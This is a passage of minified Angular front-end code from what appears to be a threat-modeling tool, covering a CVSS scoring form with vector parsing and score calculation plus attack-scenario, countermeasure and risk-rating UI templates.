"),m(78,"tr"),s(79,"\n    "),m(80,"td"),s(81,"\n      Attack Complexity (AC) \n      "),m(82,"mat-icon",1),oe(83,"translate"),s(84,"info"),u(),s(85,"\n      "),m(86,"button",2),he("click",function(){return be(e),Me(B().OpenNotes("AC"))}),oe(87,"translate"),s(88,"\n        "),m(89,"mat-icon",3),s(90,"edit_note"),u(),s(91,"\n      "),u(),s(92,"\n    "),u(),s(93,"\n    "),m(94,"td"),s(95,"\n      Confidentiality (C) \n      "),m(96,"mat-icon",1),oe(97,"translate"),s(98,"info"),u(),s(99,"\n      "),m(100,"button",2),he("click",function(){return be(e),Me(B().OpenNotes("C"))}),oe(101,"translate"),s(102,"\n        "),m(103,"mat-icon",3),s(104,"edit_note"),u(),s(105,"\n      "),u(),s(106,"\n    "),u(),s(107,"\n  "),u(),s(108,"\n  "),m(109,"tr"),s(110,"\n    "),m(111,"td"),s(112,"\n      "),m(113,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(B().entry.AC=n)})("change",function(){return be(e),Me(B().CalcScore())}),s(114,"\n        "),m(115,"mat-button-toggle",5),s(116,"Undefined"),u(),s(117,"\n        "),m(118,"mat-button-toggle",8),oe(119,"translate"),s(120,"Low"),u(),s(121,"\n        "),m(122,"mat-button-toggle",12),oe(123,"translate"),s(124,"High"),u(),s(125,"\n      "),u(),s(126,"\n    "),u(),s(127,"\n    "),m(128,"td"),s(129,"\n      "),m(130,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(B().entry.C=n)})("change",function(){return be(e),Me(B().CalcScore())}),s(131,"\n        "),m(132,"mat-button-toggle",5),s(133,"Undefined"),u(),s(134,"\n        "),m(135,"mat-button-toggle",6),oe(136,"translate"),s(137,"None"),u(),s(138,"\n        "),m(139,"mat-button-toggle",8),oe(140,"translate"),s(141,"Low"),u(),s(142,"\n        "),m(143,"mat-button-toggle",12),oe(144,"translate"),s(145,"High"),u(),s(146,"\n      "),u(),s(147,"\n    "),u(),s(148,"\n  "),u(),s(149,"\n  "),m(150,"tr"),s(151,"\n    "),m(152,"td"),s(153,"\n      Privileges Required (PR) \n      "),m(154,"mat-icon",1),oe(155,"translate"),s(156,"info"),u(),s(157,"\n      "),m(158,"button",2),he("click",function(){return be(e),Me(B().OpenNotes("PR"))}),oe(159,"translate"),s(160,"\n        "),m(161,"mat-icon",3),s(162,"edit_note"),u(),s(163,"\n      "),u(),s(164,"\n    "),u(),s(165,"\n    "),m(166,"td"),s(167,"\n      Integrity (I) \n      "),m(168,"mat-icon",1),oe(169,"translate"),s(170,"info"),u(),s(171,"\n      "),m(172,"button",2),he("click",function(){return be(e),Me(B().OpenNotes("I"))}),oe(173,"translate"),s(174,"\n        "),m(175,"mat-icon",3),s(176,"edit_note"),u(),s(177,"\n      "),u(),s(178,"\n    "),u(),s(179,"\n  "),u(),s(180,"\n  "),m(181,"tr"),s(182,"\n    "),m(183,"td"),s(184,"\n      "),m(185,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(B().entry.PR=n)})("change",function(){return be(e),Me(B().CalcScore())}),s(186,"\n        "),m(187,"mat-button-toggle",5),s(188,"Undefined"),u(),s(189,"\n        "),m(190,"mat-button-toggle",6),oe(191,"translate"),s(192,"None"),u(),s(193,"\n        "),m(194,"mat-button-toggle",8),oe(195,"translate"),s(196,"Low"),u(),s(197,"\n        "),m(198,"mat-button-toggle",12),oe(199,"translate"),s(200,"High"),u(),s(201,"\n      "),u(),s(202,"\n    "),u(),s(203,"\n    "),m(204,"td"),s(205,"\n      "),m(206,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(B().entry.I=n)})("change",function(){return be(e),Me(B().CalcScore())}),s(207,"\n        "),m(208,"mat-button-toggle",5),s(209,"Undefined"),u(),s(210,"\n        "),m(211,"mat-button-toggle",6),oe(212,"translate"),s(213,"None"),u(),s(214,"\n        "),m(215,"mat-button-toggle",8),oe(216,"translate"),s(217,"Low"),u(),s(218,"\n        "),m(219,"mat-button-toggle",12),oe(220,"translate"),s(221,"High"),u(),s(222,"\n      "),u(),s(223,"\n    "),u(),s(224,"\n  "),u(),s(225,"\n  "),m(226,"tr"),s(227,"\n    "),m(228,"td"),s(229,"\n      User Interaction (UI) \n      "),m(230,"mat-icon",1),oe(231,"translate"),s(232,"info"),u(),s(233,"\n      "),m(234,"button",2),he("click",function(){return be(e),Me(B().OpenNotes("UI"))}),oe(235,"translate"),s(236,"\n        "),m(237,"mat-icon",3),s(238,"edit_note"),u(),s(239,"\n      "),u(),s(240,"\n    "),u(),s(241,"\n    "),m(242,"td"),s(243,"\n      Availability (A) \n      "),m(244,"mat-icon",1),oe(245,"translate"),s(246,"info"),u(),s(247,"\n      "),m(248,"button",2),he("click",function(){return be(e),Me(B().OpenNotes("A"))}),oe(249,"translate"),s(250,"\n        "),m(251,"mat-icon",3),s(252,"edit_note"),u(),s(253,"\n      "),u(),s(254,"\n    "),u(),s(255,"\n  "),u(),s(256,"\n  "),m(257,"tr"),s(258,"\n    "),m(259,"td"),s(260,"\n      "),m(261,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(B().entry.UI=n)})("change",function(){return be(e),Me(B().CalcScore())}),s(262,"\n        "),m(263,"mat-button-toggle",5),s(264,"Undefined"),u(),s(265,"\n        "),m(266,"mat-button-toggle",6),oe(267,"translate"),s(268,"None"),u(),s(269,"\n        "),m(270,"mat-button-toggle",13),oe(271,"translate"),s(272,"Required"),u(),s(273,"\n      "),u(),s(274,"\n    "),u(),s(275,"\n    "),m(276,"td"),s(277,"\n      "),m(278,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(B().entry.A=n)})("change",function(){return be(e),Me(B().CalcScore())}),s(279,"\n        "),m(280,"mat-button-toggle",5),s(281,"Undefined"),u(),s(282,"\n        "),m(283,"mat-button-toggle",6),oe(284,"translate"),s(285,"None"),u(),s(286,"\n        "),m(287,"mat-button-toggle",8),oe(288,"translate"),s(289,"Low"),u(),s(290,"\n        "),m(291,"mat-button-toggle",12),oe(292,"translate"),s(293,"High"),u(),s(294,"\n      "),u(),s(295,"\n    "),u(),s(296,"\n  "),u(),s(297,"\n  "),m(298,"tr"),s(299,"\n    "),m(300,"td"),s(301,"\n      "),m(302,"mat-form-field",14),s(303,"\n        "),m(304,"mat-label"),s(305),oe(306,"translate"),u(),s(307,"\n        "),m(308,"input",15),he("ngModelChange",function(n){return be(e),Me(B().Vector=n)}),u(),s(309,"\n      "),u(),s(310,"\n      "),m(311,"button",16),he("click",function(){return be(e),Me(B().CopyVector())}),oe(312,"translate"),s(313,"\n        "),m(314,"mat-icon"),s(315,"content_copy"),u(),s(316,"\n      "),u(),s(317,"\n    "),u(),s(318,"\n    "),m(319,"td"),s(320,"\n      "),m(321,"mat-form-field",14),s(322,"\n        "),m(323,"mat-label"),s(324),oe(325,"translate"),u(),s(326,"\n        "),m(327,"input",17),he("ngModelChange",function(n){return be(e),Me(B().Score=n)}),u(),s(328,"\n      "),u(),s(329,"\n      "),m(330,"button",16),he("click",function(){return be(e),Me(B().OpenCVSS())}),oe(331,"translate"),s(332,"\n        "),m(333,"mat-icon"),s(334,"open_in_new"),u(),s(335,"\n      "),u(),s(336,"\n    "),u(),s(337,"\n  "),u(),s(338,"\n"),u()}if(2&t){const e=B();C(6),at("matTooltip",re(7,68,"shared.cvss.av")),C(4),at("matTooltip",re(11,70,"general.Notes")),C(3),V("matBadge",e.GetNotesCountOfMetric("AV"))("matBadgeHidden",e.GetNotesCountOfMetric("AV")<1),C(7),at("matTooltip",re(21,72,"shared.cvss.s")),C(4),at("matTooltip",re(25,74,"general.Notes")),C(3),V("matBadge",e.GetNotesCountOfMetric("S"))("matBadgeHidden",e.GetNotesCountOfMetric("S")<1),C(10),V("ngModel",e.entry.AV),C(5),at("matTooltip",re(43,76,"shared.cvss.av.n")),C(4),at("matTooltip",re(47,78,"shared.cvss.av.a")),C(4),at("matTooltip",re(51,80,"shared.cvss.av.l")),C(4),at("matTooltip",re(55,82,"shared.cvss.av.p")),C(8),V("ngModel",e.entry.S),C(5),at("matTooltip",re(68,84,"shared.cvss.s.u")),C(4),at("matTooltip",re(72,86,"shared.cvss.s.c")),C(11),at("matTooltip",re(83,88,"shared.cvss.ac")),C(4),at("matTooltip",re(87,90,"general.Notes")),C(3),V("matBadge",e.GetNotesCountOfMetric("AC"))("matBadgeHidden",e.GetNotesCountOfMetric("AC")<1),C(7),at("matTooltip",re(97,92,"shared.cvss.c")),C(4),at("matTooltip",re(101,94,"general.Notes")),C(3),V("matBadge",e.GetNotesCountOfMetric("C"))("matBadgeHidden",e.GetNotesCountOfMetric("C")<1),C(10),V("ngModel",e.entry.AC),C(5),at("matTooltip",re(119,96,"shared.cvss.ac.l")),C(4),at("matTooltip",re(123,98,"shared.cvss.ac.h")),C(8),V("ngModel",e.entry.C),C(5),at("matTooltip",re(136,100,"shared.cvss.c.n")),C(4),at("matTooltip",re(140,102,"shared.cvss.c.l")),C(4),at("matTooltip",re(144,104,"shared.cvss.c.h")),C(11),at("matTooltip",re(155,106,"shared.cvss.pr")),C(4),at("matTooltip",re(159,108,"general.Notes")),C(3),V("matBadge",e.GetNotesCountOfMetric("PR"))("matBadgeHidden",e.GetNotesCountOfMetric("PR")<1),C(7),at("matTooltip",re(169,110,"shared.cvss.i")),C(4),at("matTooltip",re(173,112,"general.Notes")),C(3),V("matBadge",e.GetNotesCountOfMetric("I"))("matBadgeHidden",e.GetNotesCountOfMetric("I")<1),C(10),V("ngModel",e.entry.PR),C(5),at("matTooltip",re(191,114,"shared.cvss.pr.n")),C(4),at("matTooltip",re(195,116,"shared.cvss.pr.l")),C(4),at("matTooltip",re(199,118,"shared.cvss.pr.h")),C(8),V("ngModel",e.entry.I),C(5),at("matTooltip",re(212,120,"shared.cvss.i.n")),C(4),at("matTooltip",re(216,122,"shared.cvss.i.l")),C(4),at("matTooltip",re(220,124,"shared.cvss.i.h")),C(11),at("matTooltip",re(231,126,"shared.cvss.ui")),C(4),at("matTooltip",re(235,128,"general.Notes")),C(3),V("matBadge",e.GetNotesCountOfMetric("UI"))("matBadgeHidden",e.GetNotesCountOfMetric("UI")<1),C(7),at("matTooltip",re(245,130,"shared.cvss.a")),C(4),at("matTooltip",re(249,132,"general.Notes")),C(3),V("matBadge",e.GetNotesCountOfMetric("A"))("matBadgeHidden",e.GetNotesCountOfMetric("A")<1),C(10),V("ngModel",e.entry.UI),C(5),at("matTooltip",re(267,134,"shared.cvss.ui.n")),C(4),at("matTooltip",re(271,136,"shared.cvss.ui.r")),C(8),V("ngModel",e.entry.A),C(5),at("matTooltip",re(284,138,"shared.cvss.a.n")),C(4),at("matTooltip",re(288,140,"shared.cvss.a.l")),C(4),at("matTooltip",re(292,142,"shared.cvss.a.h")),C(14),ke(re(306,144,"report.CvssVector")),C(3),V("ngModel",e.Vector),C(3),at("matTooltip",re(312,146,"general.Copy")),C(13),ke(re(325,148,"report.CvssScore")),C(3),V("ngModel",e.Score),C(3),at("matTooltip",re(331,150,"general.openInNew"))}}let Wm=(()=>{class t{constructor(e,i,n,r){this.data=e,this.dataService=i,this.dialog=n,this.clipboard=r,e&&(this.entry=e.Value)}get Score(){return this.entry.Score}set Score(e){this.entry.Score=e}get Vector(){return t.GetVector(this.entry)}set Vector(e){this.SetVector(e)}ngOnInit(){var e;this.Score||this.CalcScore(),null!==(e=this.entry)&&void 0!==e&&e.Notes||(this.entry.Notes={})}CopyVector(){this.clipboard.copy(this.Vector)}OpenCVSS(){const e=t.GetURL(this.entry);e&&window.open(e,"_blank")}CalcScore(){let e=t.GetVector(this.entry);if(e&&e.length>8){const i=new(z5e())(e);this.Score=i.getBaseScore()}}SetVector(e){if(e){let i=!0;const n=["AV","AC","PR","UI","S","C","I","A","CVSS"],r=T=>{const k=n.indexOf(T);k>=0&&n.splice(k,1)},c={};e.split("/").forEach(T=>{if(i){const k=T.split(":");if(2==k.length)if(n.includes(k[0]))switch(k[0]){case"AV":["N","A","L","P"].includes(k[1])?(c[k[0]]=k[1],r(k[0])):i=!1;break;case"AC":["L","H"].includes(k[1])?(c[k[0]]=k[1],r(k[0])):i=!1;break;case"PR":case"C":case"I":case"A":["N","L","H"].includes(k[1])?(c[k[0]]=k[1],r(k[0])):i=!1;break;case"UI":["N","R"].includes(k[1])?(c[k[0]]=k[1],r(k[0])):i=!1;break;case"S":["U","C"].includes(k[1])?(c[k[0]]=k[1],r(k[0])):i=!1;break;case"CVSS":["2.0","3.0","3.1"].includes(k[1])?(c.Version=k[1],r(k[0])):i=!1;break;default:i=!1}else i=!1;else i=!1}}),i&&(Object.keys(c).forEach(T=>{this.entry[T]=c[T]}),this.CalcScore())}}OpenNotes(e){null==this.entry.Notes[e]&&(this.entry.Notes[e]=[]),this.dialog.OpenNotesDialog(this.entry.Notes[e],!0,!1,!0,!0)}GetNotesCountOfMetric(e){return this.entry.Notes[e]?this.entry.Notes[e].length:0}static ToThreatSeverity(e){return e>=9?cn.Critical:e>=7?cn.High:e>=4?cn.Medium:e>0?cn.Low:cn.None}static GetURL(e){let i=t.GetVector(e);const n=e.Version?e.Version:"3.1";return i?"https://nvd.nist.gov/vuln-metrics/cvss/v"+n[0]+"-calculator?vector="+i.substring(i.indexOf("/")+1)+"&version="+n:null}static GetVector(e){if(e){let i="CVSS:"+(e.Version?e.Version:"3.1");return e.Vector?e.Vector.includes("CVSS")?e.Vector:i+"/"+e.Vector:(["AV","AC","PR","UI","S","C","I","A"].forEach(r=>{e[r]&&e[r].length>0&&(i+="/"+r+":"+e[r])}),i)}return null}}return t.\u0275fac=function(e){return new(e||t)(Ee(k5,8),Ee(Yi),Ee(Wn),Ee(hz))},t.\u0275cmp=Wt({type:t,selectors:[["app-cvss-entry"]],inputs:{entry:"entry"},decls:1,vars:1,consts:[[4,"ngIf"],["matTooltipShowDelay","1000",2,"vertical-align","inherit",3,"matTooltip"],["mat-icon-button","",3,"matTooltip","click"],["matBadgeColor","warn","matBadgePosition","below",3,"matBadge","matBadgeHidden"],[3,"ngModel","ngModelChange","change"],["value",""],["value","N","matTooltipShowDelay","1000",3,"matTooltip"],["value","A","matTooltipShowDelay","1000",3,"matTooltip"],["value","L","matTooltipShowDelay","1000",3,"matTooltip"],["value","P","matTooltipShowDelay","1000",3,"matTooltip"],["value","U","matTooltipShowDelay","1000",3,"matTooltip"],["value","C","matTooltipShowDelay","1000",3,"matTooltip"],["value","H","matTooltipShowDelay","1000",3,"matTooltip"],["value","R","matTooltipShowDelay","1000",3,"matTooltip"],["appearance","fill",2,"width","calc(100% - 45px)"],["matInput","",3,"ngModel","ngModelChange"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super","pointer-events","all",3,"matTooltip","click"],["matInput","","type","number",3,"ngModel","ngModelChange"]],template:function(e,i){1&e&&ne(0,W5e,339,152,"table",0),2&e&&V("ngIf",null!=i.entry)},dependencies:[Ri,an,Ac,Ta,Ea,oa,Hh,da,nn,un,Xa,Pa,b8,M8,Xi]}),t})();const F5e=["nameBox"],V5e=["searchASBox"],B5e=["searchLinkedASBox"],H5e=["searchCMBox"],U5e=["searchTCBox"];function q5e(t,a){if(1&t){const e=Ye();m(0,"button",69),he("click",function(){return be(e),Me(B(2).attackScenario.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function G5e(t,a){1&t&&(m(0,"mat-hint",70),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n      ",re(2,1,"messages.error.numberAlreadyExists"),"\n    "))}function j5e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetThreatStateName(e)))}}function Q5e(t,a){1&t&&(m(0,"mat-icon",72),oe(1,"translate"),s(2,"sync_problem"),u()),2&t&&at("matTooltip",re(1,1,"pages.modeling.attackscenario.ruleNotApplyingAnymore"))}function $5e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct("\n          ",e.Name,"\n        ")}}function K5e(t,a){if(1&t&&(m(0,"mat-optgroup",73),s(1,"\n        "),ne(2,$5e,2,2,"mat-option",10),s(3,"\n      "),u()),2&t){const e=a.$implicit;V("label",e.name),C(2),V("ngForOf",e.AttackVectors)}}function X5e(t,a){if(1&t&&(m(0,"mat-option",75),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),V("value",e),C(1),ct("\n          ",e.Name,"\n        ")}}function Y5e(t,a){if(1&t&&(m(0,"mat-optgroup",73),s(1,"\n        "),ne(2,X5e,2,3,"mat-option",74),s(3,"\n      "),u()),2&t){const e=a.$implicit;V("label",e.name),C(2),V("ngForOf",e.ThreatCategories)}}function J5e(t,a){if(1&t&&(m(0,"mat-option",75),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),V("value",e),C(1),ct("\n          ",e.Name,"\n        ")}}function Z5e(t,a){if(1&t&&(m(0,"mat-optgroup",73),oe(1,"translate"),s(2,"\n        "),ne(3,J5e,2,3,"mat-option",74),s(4,"\n      "),u()),2&t){const e=a.$implicit;at("label",re(1,2,e.name)),C(3),V("ngForOf",e.SystemThreats)}}function e7e(t,a){if(1&t){const e=Ye();m(0,"mat-checkbox",79),he("change",function(n){return be(e),Me(B(3).ThreatSourcesUpdate(n.checked))}),s(1),oe(2,"translate"),u()}if(2&t){const e=B(3);V("checked",e.ThreatSourcesAll())("indeterminate",e.ThreatSourcesSome()),C(1),ke(re(2,3,e.ThreatSourcesLabel()))}}function t7e(t,a){if(1&t&&(m(0,"mat-option",75),oe(1,"translate"),oe(2,"translate"),s(3),u()),2&t){const e=a.$implicit,i=B(3);$c("matTooltip","",re(1,4,"general.Likelihood"),": ",re(2,6,i.GetLMHName(e.Likelihood)),""),V("value",e),C(3),ct("\n        ",e.Name,"\n      ")}}function i7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",76),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-select",24),he("valueChange",function(n){return be(e),Me(B(2).attackScenario.ThreatSources=n)}),s(7,"\n      "),m(8,"input",18,77),he("keyup",function(n){return be(e),Me(B(2).OnSearchThreatSources(n))}),oe(10,"translate"),u(),s(11,"\n      "),ne(12,e7e,3,5,"mat-checkbox",78),s(13,"\n      "),ne(14,t7e,4,8,"mat-option",74),s(15,"\n    "),u(),s(16,"\n  "),u()}if(2&t){const e=Ti(9),i=B(2);C(3),ke(re(4,5,"general.ThreatSources")),C(3),V("value",i.attackScenario.ThreatSources),C(2),at("placeholder",re(10,7,"general.Search")),C(4),V("ngIf",0==e.value.length),C(2),V("ngForOf",i.GetThreatSources())}}const A5=function(t){return{item:t}};function a7e(t,a){if(1&t&&(m(0,"button",80),s(1),u()),2&t){const e=a.$implicit;B(),V("matMenuTriggerFor",Ti(178))("matMenuTriggerData",fr(3,A5,e.scenarios)),C(1),ke(e.name)}}function n7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(B(3).AdoptRiskValuesFrom(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function o7e(t,a){if(1&t&&(s(0,"\n      "),ne(1,n7e,2,2,"button",40),s(2,"\n    ")),2&t){const e=a.item;C(1),V("ngForOf",e)}}function r7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(B(2).AdoptRiskValuesFrom(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function s7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",82),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"input",83),he("ngModelChange",function(n){return be(e),Me(B(2).attackScenario.ScoreCVSS.Score=n)}),u(),s(7,"\n    "),m(8,"button",84),he("click",function(n){return be(e),B(2).EditMethodCVSS(),Me(n.stopPropagation())}),s(9,"\n      "),m(10,"mat-icon"),s(11,"edit"),u(),s(12,"\n    "),u(),s(13,"\n    "),m(14,"button",85),he("click",function(n){return be(e),B(2).RemoveMethodCVSS(),Me(n.stopPropagation())}),s(15,"\n      "),m(16,"mat-icon"),s(17,"delete"),u(),s(18,"\n    "),u(),s(19,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,2,"shared.cvss.name.s")),C(3),V("ngModel",e.attackScenario.ScoreCVSS.Score)}}function c7e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function l7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",82),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-select",46),he("valueChange",function(n){return be(e),Me(B(2).attackScenario.ScoreOwaspRR.Score=n)}),s(7,"\n      "),m(8,"mat-option"),s(9),oe(10,"translate"),u(),s(11,"\n      "),ne(12,c7e,3,4,"mat-option",10),s(13,"\n    "),u(),s(14,"\n    "),m(15,"button",84),he("click",function(n){return be(e),B(2).EditMethodOwaspRR(),Me(n.stopPropagation())}),s(16,"\n      "),m(17,"mat-icon"),s(18,"edit"),u(),s(19,"\n    "),u(),s(20,"\n    "),m(21,"button",85),he("click",function(n){return be(e),B(2).RemoveMethodOwaspRR(),Me(n.stopPropagation())}),s(22,"\n      "),m(23,"mat-icon"),s(24,"delete"),u(),s(25,"\n    "),u(),s(26,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,4,"shared.owasprr.name.s")),C(3),V("value",e.attackScenario.ScoreOwaspRR.Score),C(3),ke(re(10,6,"properties.selectNone")),C(3),V("ngForOf",e.GetSeverityTypes())}}function d7e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function m7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),B(2).attackScenario.SeverityReason="",Me(n.stopPropagation())}),s(1,"\n      "),m(2,"mat-icon"),s(3,"edit_note"),u(),s(4,"\n    "),u()}}function u7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),B(2).attackScenario.SeverityReason=null,Me(n.stopPropagation())}),s(1,"\n      "),m(2,"mat-icon"),s(3,"playlist_remove"),u(),s(4,"\n    "),u()}}function h7e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function f7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),B(2).attackScenario.LikelihoodReason="",Me(n.stopPropagation())}),s(1,"\n      "),m(2,"mat-icon"),s(3,"edit_note"),u(),s(4,"\n    "),u()}}function p7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),B(2).attackScenario.LikelihoodReason=null,Me(n.stopPropagation())}),s(1,"\n      "),m(2,"mat-icon"),s(3,"playlist_remove"),u(),s(4,"\n    "),u()}}function _7e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function g7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),B(2).attackScenario.RiskReason="",Me(n.stopPropagation())}),s(1,"\n      "),m(2,"mat-icon"),s(3,"edit_note"),u(),s(4,"\n    "),u()}}function C7e(t,a){if(1&t){const e=Ye();m(0,"button",86),he("click",function(n){return be(e),B(2).attackScenario.RiskReason=null,Me(n.stopPropagation())}),s(1,"\n      "),m(2,"mat-icon"),s(3,"playlist_remove"),u(),s(4,"\n    "),u()}}function y7e(t,a){if(1&t&&(m(0,"mat-option",71),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetRiskStrategyName(e)))}}function b7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",26),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"textarea",27),he("ngModelChange",function(n){return be(e),Me(B(2).attackScenario.SeverityReason=n)}),u(),s(7,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,3,"properties.SeverityReason")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.attackScenario.SeverityReason)}}function M7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",26),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"textarea",27),he("ngModelChange",function(n){return be(e),Me(B(2).attackScenario.LikelihoodReason=n)}),u(),s(7,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,3,"properties.LikelihoodReason")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.attackScenario.LikelihoodReason)}}function v7e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",26),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"textarea",27),he("ngModelChange",function(n){return be(e),Me(B(2).attackScenario.RiskReason=n)}),u(),s(7,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,3,"properties.RiskReason")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.attackScenario.RiskReason)}}function A7e(t,a){if(1&t&&(m(0,"button",80),s(1),u()),2&t){const e=a.$implicit;B(),V("matMenuTriggerFor",Ti(321))("matMenuTriggerData",fr(3,A5,e.countermeasures)),C(1),ke(e.name)}}function T7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(B(3).AddExistingCountermeasure(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function E7e(t,a){if(1&t&&(s(0,"\n              "),ne(1,T7e,2,2,"button",40),s(2,"\n            ")),2&t){const e=a.item;C(1),V("ngForOf",e)}}function D7e(t,a){if(1&t){const e=Ye();m(0,"button",81),he("click",function(){const r=be(e).$implicit;return Me(B(2).AddExistingCountermeasure(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function x7e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",87),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedCountermeasure=r)}),s(1,"\n          "),m(2,"mat-icon",88),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",89),s(6),oe(7,"translate"),u(),s(8,"\n          "),m(9,"button",90),he("click",function(){const r=be(e).$implicit;return Me(B(2).RemoveCountermeasure(r))}),oe(10,"translate"),m(11,"mat-icon"),s(12,"remove"),u()(),s(13,"\n          "),m(14,"button",91),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteCountermeasure(r))}),oe(15,"translate"),m(16,"mat-icon"),s(17,"delete"),u()(),s(18,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);Ct("highlight-light",i.selectedCountermeasure===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedCountermeasure===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(re(7,8,e.Name)),C(3),at("matTooltip",re(10,10,"general.Remove")),C(5),at("matTooltip",re(15,12,"general.Delete"))}}function w7e(t,a){if(1&t&&(m(0,"div",92),s(1,"\n        "),it(2,"app-countermeasure",93),s(3,"\n      "),u()),2&t){const e=B(2);C(2),V("countermeasure",e.selectedCountermeasure)}}function I7e(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-cve-entry",95),s(2,"\n      ")),2&t){const e=B(3);C(1),V("entry",e.attackScenario.CveEntry)}}function R7e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,I7e,3,1,"ng-template",94),s(16,"\n    "),u()),2&t){const e=B(2);C(5),ct("\n          ",re(6,2,"general.CveInfo"),"\n        "),C(4),ct("\n          ",e.attackScenario.CveEntry.ID,"\n          ")}}function S7e(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-attack-vector",96),s(2,"\n      ")),2&t){const e=B(3);C(1),V("canEdit",!1)("attackVector",e.attackScenario.AttackVector)}}function k7e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,S7e,3,2,"ng-template",94),s(16,"\n    "),u()),2&t){const e=B(2);C(5),ct("\n          ",re(6,2,"general.AttackVectorInfo"),"\n        "),C(4),ct("\n          ",e.attackScenario.AttackVector.Name,"\n          ")}}function P7e(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-threat-question",97),s(2,"\n      ")),2&t){const 